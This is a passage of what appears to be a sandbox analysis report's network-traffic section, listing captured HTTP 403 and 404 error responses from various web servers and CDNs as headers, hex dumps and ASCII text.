20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rs0ucNwkWyFIL605T1DBDgW8qZwEgyx6%2BgxvYTVORGWId%2FuuGhcC2lkqGTLmAC9wa1aqLSHPoPLhQ1wXjNjV4wrqhdG5nAr5Zb8XmfTIYmByufynmcQJxnMq5p%2Fnww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a715ef5e377b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 Data Ascii: 1c33<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta na
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:33 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/F6pfTDROw1o9VV/7h7Wawa,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1678431333.66013977438416783X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:34 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 32ea2a3a-a74d-4529-8ed0-33d453e5b53aCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pE%2F1XNwzBXqOV62Lu%2FTSrU2cpGSnFFYwpw%2B6hv201dWjdLia9KnXS0e8cMuPiyztr225hm0o7%2F2I8l5B8qNAGFu1OnlgNORURXgRba8h22bIv83XrM2mGIsfZSyaLVk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=156.000137Server: cloudflareCF-RAY: 7a59a721dd5c5ca4-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGEX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: f03d1e4a871a7feacab3080576b3adfdf80cb2afDate: Fri, 10 Mar 2023 06:55:34 GMTData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 38 37 39 36 22 2c 20 31 36 37 38 34 33 31 33 33 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC8796", 1678431334, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1652187628"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1652187628"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:35 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:35 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: a3dfd0884e 0.32 0.001672 0030 57daPragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cBBwbnjTjgx1jQztNS0XB185o3SnkALOWsoKj57zQuAMr%2Fr3OaI%2BtoMiSa7a9MtZVXNjSh3G3gm3SB0GArnyKiB69WUQnMkzb1qQiqX5VZSw%2Fw9LqKsUJxYliNHELB0iOPs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a73d784e6951-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:46 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MCFVVt%2BNAm8WaYNnXDnIKZfyGFs2CN03NGXJydmAsDh1BekSgw7z5vgO7x4UvWV0ZMlnXaDvcY7JOKLPDtaDcHnFqEViVqUv3WYG5WOxzWA7%2BZ9GvD1pIzaepQgo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a76ebb3a4599-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 Data Ascii: 1ae7<!DOCTYPE html><html lang="en-US"><head> <title>Just a 